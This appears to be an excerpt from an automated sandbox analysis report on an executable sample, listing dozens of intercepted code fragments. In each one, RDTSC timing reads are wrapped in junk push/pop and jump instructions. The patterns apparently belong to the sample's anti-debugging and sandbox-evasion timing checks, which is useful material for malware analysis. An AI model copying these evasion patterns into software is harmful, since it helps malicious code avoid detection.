                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFBB90 second address: FFBBB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F36B8869BFFh 0x00000010 jnl 00007F36B8869BF6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFBBB2 second address: FFBBBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFBBBD second address: FFBBCC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 jng 00007F36B8869BF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFBD1A second address: FFBD1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFBD1E second address: FFBD24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFC4A4 second address: FFC4B0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F36B8D8D086h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFCA7D second address: FFCA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFCA82 second address: FFCA8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFCA8A second address: FFCA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFCD65 second address: FFCD84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F36B8D8D086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F36B8D8D093h 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFD33C second address: FFD340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFD340 second address: FFD361 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F36B8D8D08Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f jbe 00007F36B8D8D08Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFD922 second address: FFD92C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F36B8869BF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFD92C second address: FFD935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFD935 second address: FFD93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFD93F second address: FFD94F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: FFD94F second address: FFD95B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F36B8869BF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 10035E8 second address: 10035F2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F36B8D8D08Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1007062 second address: 100707C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F36B8869C01h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100707C second address: 10070A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36B8D8D099h 0x00000009 jmp 00007F36B8D8D08Ch 0x0000000e popad 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 10071D4 second address: 10071E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 10071E7 second address: 10071F1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F36B8D8D086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100FF19 second address: 100FF50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F36B8869C08h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100FF50 second address: 100FF77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F36B8D8D086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F36B8D8D099h 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100FF77 second address: 100FF7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100FF7B second address: 100FF8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F36B8D8D086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100FF8D second address: 100FF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100E1FE second address: 100E202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100E78B second address: 100E7A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F36B8869BF6h 0x00000009 jno 00007F36B8869BF6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jc 00007F36B8869C0Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100E7A7 second address: 100E7AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100E7AD second address: 100E7B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100EB89 second address: 100EB91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100EB91 second address: 100EBB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F36B8869C04h 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100ED50 second address: 100ED65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jp 00007F36B8D8D08Eh 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100ED65 second address: 100ED6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100ED6B second address: 100ED6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100EEBE second address: 100EECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F36B8869BF6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100EECF second address: 100EED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100EED3 second address: 100EEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100EEDB second address: 100EEEB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 jg 00007F36B8D8D08Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100F68A second address: 100F6A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36B8869C08h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100F6A6 second address: 100F6AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 100DBA1 second address: 100DBBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F36B8869C04h 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1016B35 second address: 1016B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 101668B second address: 10166A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F36B8869C04h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 10166A4 second address: 10166B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F36B8D8D086h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 10167EF second address: 10167F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 10167F5 second address: 10167F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 10167F9 second address: 10167FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 10223AD second address: 10223B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1023FA8 second address: 1023FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1023FAC second address: 1023FB2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1023FB2 second address: 1023FB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1023FB8 second address: 1023FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1023FBC second address: 1023FDC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F36B8869BF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007F36B8869BF6h 0x00000013 jmp 00007F36B8869BFBh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1024124 second address: 1024167 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F36B8D8D08Ch 0x00000008 ja 00007F36B8D8D08Ch 0x0000000e jnc 00007F36B8D8D086h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jl 00007F36B8D8D08Ch 0x0000001e jl 00007F36B8D8D086h 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F36B8D8D097h 0x0000002b rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1024167 second address: 102417C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFBh 0x00000007 jnp 00007F36B8869BF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 102417C second address: 1024183 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1028BCC second address: 1028BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1028BD0 second address: 1028BD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1031C6C second address: 1031CA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F36B8869C10h 0x0000000c js 00007F36B8869BF6h 0x00000012 jmp 00007F36B8869C04h 0x00000017 popad 0x00000018 pushad 0x00000019 jc 00007F36B8869BFEh 0x0000001f jbe 00007F36B8869BF6h 0x00000025 push edx 0x00000026 pop edx 0x00000027 pushad 0x00000028 push ebx 0x00000029 pop ebx 0x0000002a pushad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1036E68 second address: 1036E74 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1036CDF second address: 1036CEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36B8869BFAh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 103FE4A second address: 103FE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 103FE52 second address: 103FE61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F36B8869BF6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 103FE61 second address: 103FE65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 103FE65 second address: 103FE6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 103ED54 second address: 103ED76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F36B8D8D098h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 103EEC4 second address: 103EECA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 103F0A0 second address: 103F0A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 10438D2 second address: 10438F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36B8869C02h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F36B8869BF6h 0x00000014 jne 00007F36B8869BF6h 0x0000001a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 10438F9 second address: 1043919 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F36B8D8D097h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1043919 second address: 104391F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 104344A second address: 1043456 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jno 00007F36B8D8D086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1047817 second address: 104781D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1052A7C second address: 1052A90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F36B8D8D08Eh 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 10507E9 second address: 10507EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 10507EF second address: 10507F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F36B8D8D086h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 105F817 second address: 105F81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 105F81B second address: 105F833 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D092h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1060EB0 second address: 1060EBA instructions: 0x00000000 rdtsc 0x00000002 js 00007F36B8869C02h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1060EBA second address: 1060EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1060EC0 second address: 1060ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1077D53 second address: 1077D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jbe 00007F36B8D8D086h 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F36B8D8D097h 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1077D79 second address: 1077D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1077D7F second address: 1077D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1077FE9 second address: 1077FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F36B8869BF6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 107842F second address: 1078435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1078435 second address: 1078439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1078439 second address: 1078465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F36B8D8D09Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F36B8D8D086h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 1078465 second address: 1078469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 107BAE5 second address: 107BAF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F36B8D8D086h 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 107FC3F second address: 107FC44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
